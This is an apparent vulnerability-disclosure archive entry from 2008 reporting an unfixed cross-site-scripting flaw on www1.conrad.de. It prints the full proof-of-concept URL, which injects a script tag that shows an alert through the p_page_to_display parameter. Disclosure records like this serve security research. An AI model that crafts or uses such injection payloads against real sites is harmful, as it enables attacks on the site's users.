Security researcher Venom23, has submitted on 25/04/2008 a cross-site-scripting (XSS) vulnerability affecting www1.conrad.de, which at the time of submission ranked 3781 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 19/06/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 25/04/2008 |
Date published: 19/06/2008 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: Venom23 |
Domain: www1.conrad.de |
Category: XSS |
Pagerank: 3781 |
|---|
URL: http://www1.conrad.de/scripts/wgate/zcop_b2c/?~template=PCAT_AREA_S_BROWSE&mfhelp=&p_selected_area=%
24ROOT&p_selected_area_fh=&perform_special_action=&glb_user_js=Y&shop=B2C&vgl_artikel_in_index=&prod
uct_show_id=&p_page_to_display=%22;/%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E
%3Cmeta&~cookies=1&zhmmh_lfo=&zhmmh_area_kz=&s_haupt_kategorie=&p_searchstring=&p_searchstring_artnr
=&p_search_category=alle&r3_matn=&insert_kz=&gvlon=&area_s_url=&brand=&amount=&new_item_quantity=&ar
ea_url=&direkt_aufriss_area=&p_countdown=&p_80=&p_80_category=&p_80_article=&p_next_template_after_l
ogin=&mindestbestellwert=&login=&password=&bpemail=&bpid=&url=&show_wk=&use_search=3&p_back_template
=&template=&kat_save=&updatestr=&vgl_artikel_in_vgl=&titel=&darsteller=®isseur=&anbieter=&genre=&
fsk=&jahr=&jahr2=&dvd_error=X&dvd_empty_error=X&dvd_year_error=&call_dvd=&kna_news=&p_status_scenari
o=&documentselector=&aktiv=&p_load_area=$ROOT&p_artikelbilder_mode=&p_sortopt=&page=&p_catalog_max_r
esults=20 |
|
Click here to view the mirror
|
|
|
| 
